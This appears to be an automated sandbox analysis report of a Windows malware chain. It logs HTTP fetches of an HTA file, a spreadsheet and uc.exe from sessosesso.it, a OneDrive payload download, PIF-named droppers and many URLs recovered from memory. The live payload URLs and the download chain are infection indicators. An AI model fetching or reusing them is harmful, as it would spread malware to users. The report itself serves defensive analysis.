Source:	Binary string: easinvoker.pdb source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.19.dr
Source:	Binary string: _.pdb source: bwsiuvcU.pif, 00000017.00000002.1680345757.000000003DA95000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000003.1516343993.000000003BDC9000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1681909755.0000000040260000.00000004.08000000.00040000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1681582310.000000003EDE1000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1787983024.0000000025D95000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1791650361.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1634916828.0000000023FF4000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1790805820.0000000026F71000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2555827704.0000000040350000.00000004.08000000.00040000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000003.1719620200.000000003BD8F000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554498447.000000003DA65000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2555544877.000000003ED31000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: calc.pdb source: mshta.exe, 00000009.00000003.1852414679.0000019AC1771000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1855006902.000001A2C46D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852363981.000001A2C46CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1863703689.0000019AC1772000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852067245.000001A2C4393000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852117667.0000019AC1757000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1851691454.000001A2C438D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1865380060.000001A2C46D1000.00000004.00000020.00020000.00000000.sdmp, yt[1].hta.9.dr
Source:	Binary string: easinvoker.pdbH source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1514685918.0000000014B20000.00000004.00000020.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.19.dr
Source:	Binary string: owershell.PSReadline.pdb source: powershell.exe, 00000011.00000002.1629294581.0000029E32432000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Roaming\uc.exe

Code function: 19_2_029858CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

19_2_029858CC

Contains functionality to check if a connection to the internet is available

Source: C:\Users\user\AppData\Roaming\uc.exe

Code function: 19_2_0299C8AC InternetCheckConnectionA,

19_2_0299C8AC

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /assets/aw/Book1.xlsx HTTP/1.1Host: sessosesso.itConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/aw/uc.exe HTTP/1.1Host: www.sessosesso.itConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 13.107.139.11 13.107.139.11

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View	ASN Name: ARUBA-ASNIT ARUBA-ASNIT

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /assets/aw/yt.hta HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.sessosesso.itConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?resid=849ABDB14CA5CEC3%21220&authkey=!AGW69_d3Nli6r4Y HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /assets/aw/yt.hta HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.sessosesso.itConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/aw/Book1.xlsx HTTP/1.1Host: sessosesso.itConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/aw/uc.exe HTTP/1.1Host: www.sessosesso.itConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?resid=849ABDB14CA5CEC3%21220&authkey=!AGW69_d3Nli6r4Y HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com

Source: unknown

DNS traffic detected: queries for: www.sessosesso.it

Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 00000011.00000002.1634145596.0000029E324B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: svchost.exe, 0000000E.00000002.2531370506.0000021C38E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: svchost.exe, 0000000E.00000003.1320362193.0000021C38C80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE3A000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025FC9000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.irmaklarpaslanmaz.com.tr
Source: powershell.exe, 0000000F.00000002.1813302246.000002B010082000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1813302246.000002B0101B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1546422130.0000029E2A0E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0C
Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A30E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE3A000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683385991.0000000041372000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1677075916.000000003BE2B000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683295114.0000000041300000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1793876103.0000000029440000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1711636457.000000002944F000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025FC9000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1794000591.00000000294C3000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD89000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2552799293.000000003BDB8000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556860764.0000000041253000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556758276.00000000411C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r3.i.lencr.org/0o
Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE3A000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683385991.0000000041372000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1677075916.000000003BE2B000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683295114.0000000041300000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1793876103.0000000029440000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1711636457.000000002944F000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025FC9000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1794000591.00000000294C3000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD89000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2552799293.000000003BDB8000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556860764.0000000041253000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556758276.00000000411C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: powershell.exe, 0000000F.00000002.1678474741.000002B000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1450441892.0000029E1A051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000F.00000002.1839645117.000002B07C378000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.o
Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A30E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: uc.exe, uc.exe, 00000013.00000002.1514685918.0000000014B20000.00000004.00000020.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1438376010.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000000.1494201950.0000000000416000.00000002.00000001.01000000.0000000F.sdmp, bwsiuvcU.pif, 00000019.00000000.1623023662.0000000000416000.00000002.00000001.01000000.0000000F.sdmp, bwsiuvcU.pif, 0000001B.00000000.1707510490.0000000000416000.00000002.00000001.01000000.0000000F.sdmp, bwsiuvcU.pif.19.dr	String found in binary or memory: http://www.pmail.com
Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE3A000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683385991.0000000041372000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1677075916.000000003BE2B000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683295114.0000000041300000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1793876103.0000000029440000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1711636457.000000002944F000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025FC9000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1794000591.00000000294C3000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD89000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2552799293.000000003BDB8000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556860764.0000000041253000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556758276.00000000411C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE3A000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683385991.0000000041372000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1677075916.000000003BE2B000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683295114.0000000041300000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1793876103.0000000029440000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1711636457.000000002944F000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025FC9000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1794000591.00000000294C3000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD89000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2552799293.000000003BDB8000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556860764.0000000041253000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556758276.00000000411C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DDE1000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025F71000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: powershell.exe, 0000000F.00000002.1678474741.000002B000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1450441892.0000029E1A051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000011.00000002.1546422130.0000029E2A0E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000011.00000002.1546422130.0000029E2A0E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000011.00000002.1546422130.0000029E2A0E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 0000000E.00000003.1320362193.0000021C38CD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 0000000E.00000003.1320362193.0000021C38C80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A30E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000F.00000002.1678474741.000002B0011BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: uc.exe, 00000013.00000002.1496845420.000000000081B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://live.com/
Source: powershell.exe, 0000000F.00000002.1813302246.000002B010082000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1813302246.000002B0101B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1546422130.0000029E2A0E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: uc.exe, 00000013.00000002.1496845420.00000000007AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/_
Source: uc.exe, 00000013.00000002.1500694013.00000000025ED000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/downlo
Source: uc.exe, 00000013.00000002.1500694013.00000000025D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/download?resid=849ABDB14CA5CEC3%21220&authkey=
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A4D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sessosesso.it
Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A4D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sessosesso.it/assets/aw/Book1.xlsx
Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A55B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.sessosesso.it
Source: mshta.exe, 00000009.00000002.1863478690.0000019AC1727000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852117667.0000019AC1724000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sessosesso.it/
Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1450441892.0000029E1A55B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.sessosesso.it/assets/aw/Book1.xlsx
Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A55B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.sessosesso.it/assets/aw/uc.exep
